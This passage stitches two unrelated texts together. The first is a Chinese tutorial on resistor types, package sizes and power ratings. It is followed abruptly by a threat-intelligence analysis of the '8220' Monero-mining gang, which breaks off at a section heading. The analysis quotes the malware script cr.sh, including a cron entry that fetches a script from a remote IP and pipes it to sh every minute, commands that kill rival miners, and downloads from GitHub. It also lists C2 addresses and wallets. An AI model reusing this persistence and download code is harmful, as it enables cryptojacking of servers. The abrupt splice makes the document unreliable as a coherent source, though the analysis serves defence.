电子元器件专题:③电阻封装种类与电阻功率大小有关联性吗?详解
一、电阻可分为:
碳膜电阻:碳膜电阻器是用有机粘合剂将碳墨、石墨和填充料配成悬浮液涂覆于绝缘基体上,经加热聚合而成。气态碳氢化合物在高温和真空中分解,碳沉积在瓷棒或者瓷管上,形成一层结晶碳膜。改变碳膜厚度和用刻槽的方法变更碳膜的长度,可以得到不同的阻值。碳膜电阻成本较低,电性能和稳定性较差,一般不适于作通用电阻器。但由于它容易制成高阻值的膜,所以主要用作高阻高压电阻器。其用途同高压电阻器
金属膜电阻:它是采用高温真空镀膜技术将镍铬或类似的合金紧密附在瓷棒表面形成皮膜,经过切割调试阻值,以达到最终要求的精密阻值,然后加适当接头切割,并在其表面涂上环氧树脂密封保护而成的。由于它是引线式电阻,方便手工安装及维修,用在大部分家电、通讯、仪器仪表上。它的耐热性、噪声电势、温度系数、电压系数等电性能比碳膜电阻器优良。金属膜电阻器的制造工艺比较灵活,不仅可以调整它的材料成分和膜层厚度,也可通过刻槽调整阻值,因而可以制成性能良好,阻值范围较宽的电阻器。这种电阻和碳膜电阻相比,体积小、噪声低、稳定性好,但成本较高,常常作为精密和高稳定性的电阻器而广泛应用,同时也通用于各种无线电电子设备中。
贴片电阻:是金属玻璃铀电阻器中的一种。是将金属粉和玻璃铀粉混合,采用丝网印刷法印在基板上制成的电阻器。耐潮湿, 高温, 温度系数小。
精密电阻:要求电阻的阻值误差、电阻的热稳定性(温度系数)、电阻器的分布参数(分布电容和分布电感)等项指标均达到一定标准的电阻器。
对1Ω(欧姆)以上阻值的电阻,与标识阻值相比±0.5%以内阻值误差的电阻可称为JEPSUN精密电阻,更高精密的可以做到0.01%精度,也就是电子工程师所说的万分之一精度,此类电阻一般为薄膜电阻,使用此材质的电阻一般才能满足生产工艺要求。这类阻值1Ω以上电阻的普通系列精密度在±5%以上,电子产品上最常见的就是5%精度的电阻,不属于精密电阻范围。
1Ω以下阻值的电阻,一般能达到±1%精密度之内,就算做精密电阻范畴了,因为阻值基数很小,就算是1%的误差,实际的阻值误差已经很小了。更高精密的可以做到±0.5%以内,但工艺要求,技术要求较高。
水泥电阻:水泥电阻就是用水泥(其实不是水泥而是耐火泥,这是俗称)灌封的电阻器,就是将电阻线绕在无碱性耐热瓷件上,外面加上耐热、耐湿及耐腐蚀之材料保护固定并把绕线电阻体放入方形瓷器框内,用特殊不燃性耐热水泥充填密封而成。水泥电阻的外侧主要是陶瓷材质。
光敏电阻:光敏电阻又称光导管,常用的制作材料为硫化镉,另外还有硒、硫化铝、硫化铅和硫化铋等材料。这些制作材料具有在特定波长的光照射下,其阻值迅速减小的特性。这是由于光照产生的载流子都参与导电,在外加电场的作用下作漂移运动,电子奔向电源的正极,空穴奔向电源的负极,从而使光敏电阻器的阻值迅速下降。
热敏电阻:热敏电阻器是敏感元件的一类,按照温度系数不同分为正温度系数热敏电阻器(PTC)和负温度系数热敏电阻器(NTC)。热敏电阻器的典型特点是对温度敏感,不同的温度下表现出不同的电阻值。正温度系数热敏电阻器(PTC)在温度越高时电阻值越大,负温度系数热敏电阻器(NTC)在温度越高时电阻值越低,它们同属于半导体器件。
压敏电阻:在一定电流电压范围内电阻值随电压而变,或者是说"电阻值对电压敏感"的阻器。压敏电阻器的电阻体材料是半导体,所以它是半导体电阻器的一个品种。现在大量使用的"氧化锌"(ZnO)压敏电阻器,它的主体材料有二价元素(Zn)和六价元素氧(O)所构成。所以从材料的角度来看,氧化锌压敏电阻器是一种“Ⅱ-Ⅵ族氧化物半导体”。 在中国台湾,压敏电阻器称为"突波吸收器",有时也称为“电冲击(浪涌)抑制器(吸收器)”。压敏电阻是一种限压型保护器件。利用压敏电阻的非线性特性,当过电压出现在压敏电阻的两极间,压敏电阻可以将电压钳位到一个相对固定的电压值,从而实现对后级电路的保护。压敏电阻的主要参数有:压敏电压、通流容量、结电容、响应时间等。
绕线电阻:绕线电阻是用镍铬线或锰铜线、康铜线绕在瓷管上制成的,分固定式和可调试两种。
优点: 阻值精度极高,工作时噪声小、稳定可靠,温度系数小,能承受高温,在环境温度170℃下仍能正常工作。
缺点: 体积大、阻值较低,大多在100KΩ以下。另外,由于结构上的原因,其分布电容和电感系数都比较大,不能在高频电路中使用。
绕线电阻器主要用来在低频交流电路中发挥降压、分流、负载、反馈、转能、匹配等作用,或在电源电路中起到吸收器和分压器的作用,也可用作震荡回路和变压器内衰减调整及脉冲形成电路中的分流器。此外,也可用于整流器中滤波级电容器的放电和消火花。同时可广泛应用于家电、医疗设备、汽车行业、铁路、航空、军用设备仪器等领域。
排阻:也叫集成电阻,是一种集多只电阻于一体的电阻器件。
其外形及结构如右图所示。图中,BX表示产品型号,“10”表示有效数字,“3”表示有效数字后边加0的个数,103即10000(10k)。“9”表示此阻排有9个引脚,其中一个是公共引脚。公共引脚一般都在两边,用色点标示。
排电阻体积小,安装方便,适合多个电阻阻值相同,而且其中一个引脚都是连在电路的同一位置的场合。
排电阻体积小,安装方便
二、封装:
是指安装半导体集成电路芯片用的外壳,它不仅起着安放、固定、密封、保护芯片和增强导热性能的作用,而且还是沟通芯片内部世界与外部电路的桥梁--芯片上的接点用导线连接到封装外壳的引脚上,这些引脚又通过印刷电路板上的导线与其他器件建立连接,从而实现内部芯片与外部电路的连接。因为芯片必须与外界隔离,以防止空气中的杂质对芯片电路的腐蚀而造成电气性能下降。另一方面,封装后的芯片也更便于安装和运输。由于封装技术的好坏还直接影响到芯片自身性能的发挥和与之连接的PCB(印制电路板)的设计和制造,因此它是至关重要的。
分类:
封装主要分为DIP双列直插和SMD贴片封装两种。
发展进程
结构方面:TO->DIP->PLCC->QFP->BGA->CSP;
材料方面:金属、陶瓷->陶瓷、塑料->塑料;
引脚形状:长引线直插->短引线或无引线贴装->球状凸点;
装配方式:通孔插装->表面组装->直接安装
贴片封装尺寸规格
贴片电阻的额定功率
贴片电阻的额定功率
三、贴片电阻的标准封装及额定功率
国内贴片电阻的命名方法:
1、5%精度的命名:RS-05K102JT2、1%精度的命名:RS-05K100 2FTR -表示电阻
S -表示功率
04 02是1/16 W
0603 是1/10W
0805 是1/8W
1206 是1/4W
1210 是1/3W
1812 是1/2W
2010 是3/4W
2512 是1W。
05 -表示尺寸(英寸):
02表示0402
03表示0603
05表示0805
06表示1206
1210表示1210
1812表示1812
10表示1210
12表示2512。
K -表示温度系数为100PPM,102-5%精度阻值表示法:前两位表示有效数字,第三位表示有多少个零,基本单位是Ω,102=10000 Ω=1KΩ。1002是1%阻值表示法:前三位表示有效数字,第四位表示有多少个零,基本单位是Ω,1002=100000 Ω=10KΩ。
J -表示精度为5%、F-表示精度为1%。
T -表示编带包装
0805的焊盘大小虽然固定,但是厚度和陶瓷 的材质会有差别,普通的允许耗散功率是1/10W-1/8W,功率型(绿色)可以做到1/4W。
如果你想让贴片电阻有较大的功耗,建议你把焊盘做在面积比较大的覆铜上,这样,普通0805封装的电阻1/4W也不会有问题,只是热稳定性稍微差一点点。1206的在1/8W-1/2W之间
电容电阻外形尺寸与封装的对应关系是:
0402=1.0mmx0.5mm
0603=1.6mmx0.8mm
0805=2.0mmx1.2mm
1206=3.2mmx1.6mm
1210=3.2mmx2.5mm
1812=4.5mmx3.2mm
22 25=5.6mmx6.5mm
封装额定功率@ 70°C英制公制(mil )(mm) 常规功率系列 提升功率系列最大工作电压(V)
0201 0603:1/20W/25V0402 1005:1/16W/50V0603 1608:1/16W1/10W50V0805 2012:1/10W1/8W15 0V1206 3216:1/8W1/4W200V1210 3225:1/4W1/3W200V1812 4832:1/2W/200V2010 5025:1/2W3/4W200V2512 6432:1W/200V
标准阻值表1E-960603F(+1%) Standard Resistance Table阻值 代码 阻值 代码 阻值 代码 阻值 代码 阻值 代码
10.0 01X 100 01A 1.00K 01B 10.0K 01C 100K 01D10.2 02X 102 02A 1.02K 02B 10.2K 02C 102K 02D10.5 03X 105 03A 1.05K 03B 10.5K 03C 105K 03D10.7 04X 107 04A 1.07K 04B 10.7K 04C 107K 04D11.0 05X 110 05A 1.10K 05B 11.0K 05C 110K 05D11.3 06X 113 06A 1.13K 06B 11.3K 06C 113K 06D11.5 07X 115 07A 1.15K 07B 11.5K 07C 115K 07D11.8 08X 118 08A 1.18K 08B 11.8K 08C 118K 08D12.109 X 121 09A 1.21K 09B 12.1K 09C 121K 09D12.4 10X 124 10A 1.24K 10B 12.4K 10C 124K 10D12.7 11X 127 11A 1.27K 11B 12.7K 11C 127K 11D13.0 12X 130 12A 1.30K 12B 13.0K 12C 130K 12D13.3 13X 133 13A 1.33K 13B 13.3K 13C 133K 13D13.7 14X 137 14A 1.37K 14B 13.7K 14C 137K 14D14.0 15X 140 15A 1.40K 15B 14.0K 15C 140K 15D14.3 16X 143 16A 1.43K 16B 14.3K 16C 143K 16D14.7 17X 147 17A 1.47K 17B 14.7K 17C 147K 17D15.0 18X 150 18A 1.50K 18B 15.0K 18C 150K 18D15.4 19X 154 19A 1.54K 19B 15.4K 19C 154K 19D15.8 20X 158 20A 1.58K 20B 15.8K 20C 158K 20D16.2 21X 162 21A 1.62K 21B 16.2K 21C 162K 21D16.5 22X 165 22A 1.65K 22B 16.5K 22C 165K 22D16.9 23X 169 23A 1.69K 23B 16.9K 23C 169K 23D17.4 24X 174 24A 1.74K 24B 17.4K 24C 174K 24D17.8 25X 178 25A 1.78K 25B 17.8K 25C 178K 25D18.2 26X 182 26A 1.82K 26B 18.2K 26C 182K 26D18.7 27X 187 27A 1.87K 27B 18.7K 27C 187K 27D19.1 28X 191 28A 1.91K 28B 19.1K 28C 191K 28D19.6 29X 196 29A 1.96K 29B 19.6K 29C 196K 29D20.0 30X 200 30A 2.00K 30B 20.0K 30C 200K 30D20.5 31X 205 31A 2.05K 31B 20.5K 31C 205K 31D21.0 32X 210 32A 2.10K 32B 21.0K 32C 210K 32D21.5 33X 215 33A 2.15K 33B 21.5K 33C 215K 33D22.1 34X 221 34A 2.21K 34B 22.1K 34C 221K 34D22.6 35X 226 35A 2.26K 35B 22.6K 35C 226K 35D23.2 36X 232 36A 2.32K 36B 23.2K 36C 232K 36D23.7 37X 237 37A 2.37K 37B 23.7K 37C 237K 37D24.3 38X 243 38A 2.43K 38B 24.3K38C 243K 38D24.9 39X 249 39A 2.49K 39B 24.9K 39C 249K 39D25.5 40X 255 40A 2.55K 40B 25.5K 40C 255K 40D26.1 41X 261 41A 2.61K 41B 26.1K 41C 261K 41D26.7 42X 267 42A 2.67K 42B 26.7K 42C 267K 42D27.4 43X 274 43A 2.74K 43B 27.4K 43C 274K 43D28.0 44X 280 44A 2.80K 44B 28.0K 44C 280K 44D28.7 45X 287 45A 2.87K 45B 28.7K 45C 287K 45D29.4 46X 294 46A 2.94K 46B 29.4K 46C 294K 46D30.1 47X 301 47A 3.01K 47B 30.1K 47C 301K 47D30.9 48X 309 48A 3.09K 48B 30.9K 48C 309K 48D
贴片电阻电容常见封装有9种(电容指无级贴片),有英制和公制两种表示方式。英制表示方法是采用4位数字表示的EIA(美国电子工业协会)代码,前两位表示电阻或电容长度,后两位表示宽度,以英寸为单位。我们常说的0805封装就是指英制代码。实际上公制很少用到,公制代码也由4位数字表示,其单位为毫米,与英制类似。
四、封装额定功率和工作电压
常规的贴片电阻额定功率及最大工作电压如下表所示:
英制
额定功率W
最大工作电压V
0201 1/20W 25V
0402 1/16W 50V
0603 1/10W 50V
0805 1/8W 150V
1206 1/4W 200V
1210 1/3W 200V
1812 1/2W 200V
2010 3/4W 200V
2512 1W 200V
三、关于封装和额定功率补充
关于电容封装,除了上面的贴片封装外,对无极性电容,其封装模型还有RAD类型,例如“RAD-0.1”“RAD-0.2”等,后缀数字表示封装模型中两个焊盘间的距离,单位为英寸。有极的电解电容的封装模型为RB类型,例如从“RB-.2/.4”到“RB-.5/.10”,其后缀的第一个数字表示封装模型中两个焊盘间的距离,第二个数字表示电容外形的尺寸,单位为也是英寸。
电阻功率设计上应该按照70%额定功率降额使用,如果环境温度太高超过70度以上,还应该再次降额使用,具体需根据该产品的温度曲线确定。
PCB设计中封装库的使用,对于这些主流的电阻封装,都是有现成库可以调用的,包括RAD类型,如果如要设计自己的封装库,那么就可以按照1mil=0.001英寸,1英寸=2.54cm换算关系设计,(1英寸=1000mil)对于外圈的丝印不要设计的太松散,否则实际使用很容易跟其他丝印重叠。
五、直插电阻的封装及功率大小分类:
直插式电阻多是面向大功率电路应用,由于直插式无源器件体积普遍要比贴片式要大一些,直插式电阻封装尺寸,而且直插式器件在制作PCB时需要打孔,焊接工艺跟贴片式也有差别,较为麻烦。
直插式电阻封装为AXIAL-xx形式(比如AXIAL-0.3、AXIAL-0.4),后面的xx代表焊盘中心间距为xx英寸,单位为英寸。常见的固定(色环)电阻如下图
直插电阻的封装及功率大小分类
常见封装:AXIAL-0.3、AXIAL-0.4、AXIAL-0.5、AXIAL-0.6、AXIAL-0.7、AXIAL-0.8、AXIAL-0.9、AXIAL-1.0。
尺寸大小如图(AXIAL-0.3,默认焊盘直径为62mil,其中焊孔直径为32mil):
常见封装
另外很多热敏、压敏、光敏、湿敏电阻的封装如下图,这类电阻可以参照无极电容封装来设计,比如RAD-0.2等等。
很多热敏、压敏、光敏、湿敏电阻的封装
可调式电阻器封装一般都不能按照上述封装进行,比如引导的独特性,需要遵照产品手册进行单独设计。如图:
可调式电阻器封装
六、贴片电阻常见封装
贴片电阻常见封装有9种,用两种尺寸代码来表示。一种尺寸代码是由4位数字表示的EIA(美国电子工业协会)代码,前两位与后两位分别表示电阻的长与宽,以英寸为单位。我们常说的0603封装就是指英制代码。另一种是米制代码,也由4位数字表示,其单位为毫米。下表列出贴片电阻封装英制和公制的关系及详细的尺寸:
贴片电阻常见封装
贴片元件的封装
一、 零件规格:(a)、零件规格即零件的外形尺寸,SMT发展至今,业界为方便作业,已经形成了一个标准零件系列,各家零件供货商皆是按这一标准制造。
标准零件之尺寸规格有英制与公制两种表示方法,如下表
英制表示法1206 0805 0603 0402 公制表示法3216 2125 1608 1005含义
L:1.2inch(3.2mm)W:0.6inch(1.6mm)L:0.8inch(2.0mm)W:0.5inch(1.25mm) L:0.6inch(1.6mm)W:0.3inch(0.8mm)L:0.4inch(1.0mm)W:0.2inch(0.5mm)
注:
a、L(Length):长度; W(Width):宽度; inch:英寸b、1inch=25.4mm(b)、在(1)中未提及零件的厚度,在这一点上因零件不同而有所差异,在生产时应以实际量测为准。
(c)、以上所讲的主要是针对电子产品中用量最大的电阻(排阻)和电容(排容),其它如电感、二极管、晶体管等等因用量较小,且形状也多种多样,在此不作讨论。
(d)、SMT发展至今,随着电子产品集成度的不断提高,标准零件逐步向微型化发展,如今最小的标准零件已经到了0201。
二、常用元件封装1)电阻:
最为常见的有0805、0603两类,不同的是,它可以以排阻的身份出现,四位、八位都有,具体封装样式可参照MD16仿真版,也可以到设计所内部PCB库查询。
注:
ABCD四类型的封装形式则为其具体尺寸,标注形式为L X S X H1210具体尺寸与电解电容B类3528类型相同
0805具体尺寸:2.0 X 1.25 X 0.5(公制表示法)
1206具体尺寸:3.0 X 1.5 0X 0.5(公制表示法)
2)电阻的命名方法
1、5%精度的命名: RS – 05 K 102 JT 2、1%精度的命名:RS – 05 K 1002 FT R -表示电阻
S -表示功率
0402是1/16W、
0603是1/10W、
0805是1/8W、
1206是1/4W、
1210是1/3W、
1812是1/2W、
2010是3/4W、
2512是1W。
05 -表示尺寸(英寸):
02表示0402、
03表示0603、
05表示0805、
06表示1206、
1210表示1210、
1812表示1812、
10表示1210、
12表示2512。
K -表示温度系数为100PPM。
102 -5%精度阻值表示法:
前两位表示有效数字,第三位表示有多少个零,基本单位是Ω,102=1000Ω=1KΩ。
1002 是1%阻值表示法:
前三位表示有效数字,第四位表示有多少个零,基本单位是Ω,1002=10000Ω=10KΩ。
J -表示精度为5%、
F-表示精度为1%。
T -表示编带包装
3)电容:
可分为无极性和有极性两类:无极性电容下述两类封装最为常见,即0805、0603;
有极性电容也就是我们平时所称的电解电容,一般我们平时用的最多的为铝电解电容,由于其电解质为铝,所以其温度稳定性以及精度都不是很高,而贴片元件由于其紧贴电路版,所以要求温度稳定性要高,所以贴片电容以钽电容为多,根据其耐压不同,贴片电容又可分为A、B、C、D四个系列,具体分类如下:
类型 封装形式耐压
A 3216 10VB 3528 16VC 6032 25VD 7343 35V贴片钽电容的封装是分为
A型(3216),
B型(3528),
C型(6032),
D型(7343),
E型(7845)。有斜角的是表示正极
4)、钽质电容(Tantalum)钽质电容已经越来越多应用于各种电子产品上,属于比较贵重的零件,发展至今,也有了一个标准尺寸系列,用英文字母Y、A、X、B、C、D来代表。
其对应关系如下表
型号 Y A X B C D规格
L(mm) 3.2 3.8 3.5 4.7 6.0 7.3W (mm) 1.6 1.9 2.8 2.6 3.2 4.3T (mm) 1.6 1.6 1.9 2.1 2.5 2.8注意:电容值相同但规格型号不同的钽质电容不可代用。
如:10UF/16V”B”型与10UF/16V”C”型不可相互代用。
二极管:
根据所承受电流的的限度,封装形式大致分为两类,
小电流型(如1N4148)封装为1206,
大电流型(如IN4007)暂没有具体封装形式,只能给出具体尺寸:5.5 X 3 X 0.5发光二极管:颜色有红、黄、绿、蓝之分,亮度分普亮、高亮、超亮三个等级,
常用的封装形式有三类: 0805、1206、1210
元件 代号 封装 备注
电阻 R AXIAL0.3电阻 R AXIAL0.4电阻 R AXIAL0.5电阻 R AXIAL0.6电阻 R AXIAL0.7电阻 R AXIAL0.8电阻 R AXIAL0.9电阻 R AXIAL1.0电容 C RAD0.1 方型电容
电容 C RAD0.2 方型电容
电容 C RAD0.3 方型电容
电容 C RAD0.4 方型电容
电容 C RB.2/.4 电解电容
电容 C RB.3/.6 电解电容
电容 C RB.4/.8 电解电容
电容 C RB.5/1.0 电解电容
保险丝 FUSE FUSE二极管 D DIODE0.4 IN4148二极管 D DIODE0.7 IN5408三极管 Q T0-126 三极管 Q TO-3 3DD15三极管 Q T0-66 3DD6三极管 Q TO-220 TIP42电位器 VR VR1电位器 VR VR2电位器 VR VR3电位器 VR VR4电位器 VR VR5元件 代号 封装 备注
插座 CON2 SIP2 2脚
插座 CON3 SIP3 3插座 CON4 SIP4 4插座 CON5 SIP5 5插座 CON6 SIP6 6DIP插座 CON16 SIP16 16插座 CON20 SIP20 20整流桥堆D D-37R 1A直角封装
整流桥堆D D-38 3A四脚封装
整流桥堆D D-44 3A直线封装
整流桥堆D D-46 10A四脚封装
集成电路U DIP8(S) 贴片式封装
集成电路U DIP16(S) 贴片式封装
集成电路U DIP8(S) 贴片式封装
集成电路U DIP20(D) 贴片式封装 集成电路U DIP4 双列直插式
集成电路U DIP6 双列直插式
集成电路U DIP8 双列直插式
集成电路U DIP16 双列直插式
集成电路U DIP20 双列直插式
集成电路U ZIP-15H TDA7294集成电路U ZIP-11HDual In-line Package双列直插封装
QFPQuad Flat Package四边引出扁平封装
PQFPPlastic Quad Flat Package塑料四边引出扁平封装
SQFPShorten Quad Flat Package缩小型细引脚间距QFPBGABall Grid Array Package球栅阵列封装
PGAPin Grid Array Package针栅阵列封装
CPGACeramic Pin Grid Array陶瓷针栅阵列矩阵
PLCCPlastic Leaded Chip Carrier塑料有引线芯片载体
CLCCCeramic Leaded Chip Carrier塑料无引线芯片载体
SOPSmall Outline Package小尺寸封装
TSOPThin Small Outline Package薄小外形封装
SOTSmall Outline Transistor小外形晶体管
SOJSmall Outline J-lead PackageJ形引线小外形封装
SOICSmall Outline Integrated Circuit Package小外形集成电路封装
疑似国内来源的“8220挖矿团伙”追踪溯源分析
背景
当今互联网的高速发展,孕育出了一批高新产业,如人工智能、分布式计算、区块链、无人驾驶等。这些高新技术为人们生活带来便利的同时,引发的安全问题也日益凸显。随着区块链技术的普及,其涉及的虚拟数字货币也创造了巨大的财富。这些虚拟货币可以通过“挖矿”的形式获取,“矿工”越多,利益越大。因此,近年来有越来越多的黑客团伙通过非法入侵控制互联网上的计算机并植入木马程序偷偷进行挖矿活动,为自己谋取暴利。
而在近期,360威胁情报中心根据某高校客户的反馈捕获到一批新的针对Linux平台的挖矿木马,而通过溯源关联分析发现这只是一个疑似国内来源的专业黑客团伙长期活动中的一部分。360威胁情报中心监测到该团伙在过去的一年非常活跃,使用了多个漏洞对网络中的服务器进行攻击:例如使用了WebLogic XMLDecoder反序列化漏洞、Drupal的远程任意代码执行漏洞、JBosss反序列化命令执行漏洞、Couchdb的组合漏洞、Redis、Hadoop未授权访问漏洞等入侵互联网中的服务器并植入挖矿木马长期获利。在一系列的攻击活动中,我们发现该团伙的C2服务器统一使用8220号端口,因此360威胁情报中心将该团伙命名为“8220挖矿团伙”,并在后续的分析中以此代号对该团伙进行相关分析。
来源
近日,360威胁情报中心接到某高校客户反馈:最近几台用做分布式计算的服务器出现机器不稳定、卡顿、服务响应不及时等现象,他们通过对系统性能的检查,发现CPU利用率高达700%,这使得他们感到疑惑。360威胁情报中心协助用户对此事件进行了跟进分析,发现这是一起攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击并植入了最新的门罗币挖矿木马进行挖矿的安全事件。
问题排查
在获得客户同意后,360威胁情报中心研究人员对存在问题的Linux服务器进行了远程排查,发现攻击者是通过未打补丁的Hadoop Yarn资源管理系统入侵服务器的。进一步排查后获取到一个最新的Linux挖矿木马,排查过程如下。(怀疑自己中了同类挖矿木马的用户,可以使用如下命令进行自检,清理方案详见安全建议一节。)
首先执行$ top命令,检查系统运行状态,此台Linux服务器的CPU利用率为732% 再执行$ ps aux | grep [pid]命令,定位到可疑的挖矿木马文件,位于/var/tmp/目录下 继续执行$ hadoop version命令,检查Hadoop版本,当前Linux服务器上安装的Hadoop版本号为2.6.0(此版本支持认证服务,但若未开启,攻击者则可通过Hadoop Yarn资源管理系统REST API未授权漏洞入侵系统) 执行$ crontab -u yarn -l命令,检查任务计划,yarn用户每分钟向C2地址发起请求,获取最新脚本文件 执行$ head /var/log/cron-20180617命令(实际操作中需要查看对应的日志文件),检查任务计划日志,发现挖矿木马在6月10日替换过C2地址通过上述操作,我们定位到了此次事件中的门罗币挖矿木马程序和核心控制脚本,并进行了详细分析,分析情况见样本分析一节。
攻击植入过程分析
通过对其中某台服务器检查,360威胁情报中心初步判定攻击者利用了Hadoop Yarn REST API未授权漏洞入侵了这些服务器,从而植入挖矿木马实现获利:
Hadoop Yarn REST API 未授权漏洞是由于YARN配置不当而引起的:若服务器未开启Kerberos认证服务,攻击者可以直接向Hadoop服务器的8088/8090端口发送请求,申请新的Application ID,获取服务器返回的ID后,攻击者便可向Hadoop服务提交作业,在作业中添加恶意载荷,执行远程指令,进而实现控制服务器,完成挖矿等活动。
360威胁情报中心分析了整个攻击植入流程如下:
样本分析
相关样本
我们将此次事件中挖矿木马的核心文件以列表的形式整理如下,并逐一进行分析:
文件名MD5作用 cr.sh1f6554f2559d83ace7f0af82d32beb72Shell脚本,用于下载挖矿程序和配置文件x_647f4d9a672bb7ff27f641d29b99ecb08a64位ELF挖矿程序x_32b00f4bbd82d2f5ec7c8152625684f85332位ELF挖矿程序w.conf配置文件,保存钱包地址,矿池地址
样本分析–cr.sh核心脚本
攻击者利用YARN默认开放的8088端口服务,向服务器提交恶意作业,该作业包含远程下载并执行Shell脚本的命令。下载回来的脚本cr.sh完成如下功能:
清理主机环境:停止、删除主机已经存在的其他挖矿程序检查主机环境:检查指定的挖矿程序是否已经存在配置主机环境:下载挖矿程序和配置文件并执行持续感染主机:设置任务计划,保持更新,持续感染主机清理任务计划:清除其他挖矿相关的任务计划清理主机环境代码片段:结束当前主机正在运行的其他已知挖矿程序并删除,已知挖矿程序的文件名如pscf、ntpd、ntp、qq、qq1等:
...
ps ax | grep 'wc.conf\|wq.conf\|wm.conf\|wt.conf' | grep -v grep | grep 'ppl\|pscf\|ppc\|ppp' | awk '{print $1}' | xargs kill -9
rm -rf /var /tmp/pscf*
rm -rf /tmp/pscf*
pkill -f ririg
rm -rf /var /tmp/ntpd
pkill -f /var /tmp/ntpd
rm -rf /var /tmp/ntp
pkill -f /var /tmp/ntp
rm -rf /var /tmp/qq
rm -rf /var /tmp/qq1
pkill -f /var /tmp/qq
rm -rf /tmp/qq
rm -rf /tmp/qq1
pkill -f /tmp/qq
pkill -f /var /tmp/aa
rm -rf /var /tmp/aa
...
核心功能代码片段:代码会先检查本地挖矿程序是否已经存在,如果不存在则调用downloadIfNeed函数,该函数会检查并下载最新的挖矿程序和配置文件。downloadIfNeed函数执行完成之后,会利用nohup命令后台执行挖矿程序,同时删除配置文件,防止泄漏个人钱包地址,矿池地址等:
...
if [ ! "$(ps -fe|grep '/tmp/java'|grep 'w.conf'|grep -v grep)" ];
then
downloadIfNeed
chmod +x $DIR/java
$WGET $DIR/w.conf https://raw.githubusercontent.com/ffazop1/mygit/master/w.conf
nohup $DIR/java -c $DIR/w.conf > /dev/null 2>&1 &
sleep 5
rm -rf $DIR/w.conf
else
echo "Running"
fi
...
任务计划相关代码片段:代码会检查当前任务计划中,是否存在46.249.38.186地址,如果没有,则会写入利用curl或者wget下载并执行cr.sh脚本的任务计划,同时会调用pkill命令结束其他已知的挖矿进程、清理其他挖矿脚本的任务计划:
...
if crontab -l | grep -q "46.249.38.186"
then
echo "Cron exists"
else
echo "Cron not found"
LDR="wget -q -O -"
if [ -s /usr/bin/curl ];
then
LDR="curl";
fi
if [ -s /usr/bin/wget ];
then
LDR="wget -q -O -";
fi
(crontab -l 2>/dev/null; echo "* * * * * $LDR http://46.249.38.186/cr.sh | sh > /dev/null 2>&1")| crontab -
fi
pkill -f logo4.jpg
pkill -f logo0.jpg
pkill -f logo9.jpg
pkill -f jvs
pkill -f javs
pkill -f 192.99.142.248
rm -rf /tmp/pscd*
rm -rf /var/tmp/pscd*
crontab -l | sed '/192.99.142.232/d' | crontab -
crontab -l | sed '/192.99.142.226/d' | crontab -
crontab -l | sed '/192.99.142.248/d' | crontab -
crontab -l | sed '/45.77.86.208/d' | crontab -
...
样本分析–挖矿程序
文件名MD5版本号编译时间 x_647f4d9a672bb7ff27f641d29b99ecb08a2.6.220180624x_32b00f4bbd82d2f5ec7c8152625684f8532.5.220180520
cr.sh脚本中内置了两个挖矿程序的MD5,如果当前主机中的挖矿程序MD5不在这两个MD5中,则cr.sh会从指定的服务器上下载对应的挖矿程序。
通过360威胁情报中心大数据分析平台,我们获取到这两个MD5对应对文件。经过简单分析,这两个文件分别为Linux下的32位和64位挖矿程序,并且都是基于XMRig[2]开源挖矿工具修改的。挖矿程序支持如下命令:
32位挖矿程序基于XMRig2.5.2版本修改,2016年编译生成,程序中内置1个钱包地址:48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD,属于开源挖矿软件作者,用于抽水。
64位挖矿程序基于XMRig2.6.2修改,2017年编译生成,程序中内置两个钱包地址,一个属于开源软件作者,另一个钱包地址:46CQwJTeUdgRF4AJ733tmLJMtzm8BogKo1unESp1UfraP9RpGH6sfKfMaE7V3jxpyVQi6dsfcQgbvYMTaB1dWyDMUkasg3S,则可定位到开源项目cpuhunter[3]。
样本分析–w.conf配置文件
cr.sh脚本同时会从指定的服务器上下载挖矿配置文件,作为参数传递给挖矿程序,并在挖矿开始后删除该配置文件,保证隐私性。我们通过配置文件中的钱包地址和矿池地址信息关联到了“8220挖矿团伙”大量利用服务器漏洞进行入侵挖矿的攻击事件,详见溯源与关联一节。
C2信息
本次事件中,攻击者使用了Github作为云分发平台,保存挖矿程序和配置文件。360威胁情报中心数据平台显示,该攻击者会不定期的创建删除Github账号,保证可用性及隐私性。
已使用的Github账户名(均已删除):
ffazop1zzgamond1Github项目地址(均已删除):
https://raw.githubusercontent.com/ffazop1/mygit/master/w.confhttps://raw.githubusercontent.com/ffazop1/mygit/master/x_64https://raw.githubusercontent.com/zzgamond1/mygit/master/w.confhttps://raw.githubusercontent.com/zzgamond1/mygit/master/x_64溯源与关联
使用360威胁情报中心数据分析平台对此次事件中出现的文件、IP地址、端口、关键字、钱包地址、MD5等进行关联分析,我们跟踪到一个疑似国内来源的挖矿黑客团伙,在该团伙所有的挖矿攻击活动中都拥有以下共同特点,使得360威胁情报中心将这些挖矿攻击事件全部关联到同一伙人身上:
端口关联
在多起事件中,出现的C2服务器统一使用8220号端口,因此我们可将其作为身份识别的一个弱特征。
文件名关联
在多起事件中,重复使用了相同的文件名,例如1.ps1、2.ps1、logo0.jpg、logo2.jpg、logo3.jpg、logo4.jpg、logo7.jpg等,因此我们也将其作为身份识别的一个弱特征。
钱包地址关联
从同一个C2上,我们获取到该团伙不同时期使用的两个脚本,这两个脚本包含了两个不同的门罗币钱包地址,并且这两个钱包地址在这些事件中都有使用。考虑钱包的私有特性,我们可将其作为身份识别的一个强特征。
且通过大数据分析显示,该团伙已经存在很长时间,并且在过去一年中异常活跃,在几起曝光的严重漏洞攻击事件中,都有该团伙的身影。另外从关联的信息中,我们发现该团伙的挖矿活动涉及Linux和Windows平台。种种迹象表明,该团伙不断在积累自身的网络攻击武器库,以支撑他们对网络中存在漏洞的主机进行自动化的攻击,最终拿下主机并实现挖矿的目的。
并且360威胁情报中心推测该团伙是利用Docker进行C2服务器自动化部署工作,导致这些C2统一使用8220号端口与木马进行通信。因此360威胁情报中心将该团伙命名为“8220挖矿团伙” :
运行在C2服务器8220端口上的Apache服务
攻击活动时间线
通过对关联信息的整理归纳,我们绘制了过去一年与该团伙相关的攻击活动的时间图:
活动图中的时间顺序仅为我们发现该团伙最早的活动时间,并不表示该团伙只在此时间段利用此漏洞。相应的,此图直观体现了该团伙积累了较多的网络攻击武器。我们有理由相信,还有大量关于该团伙的未被曝光的攻击事件。
攻击手法
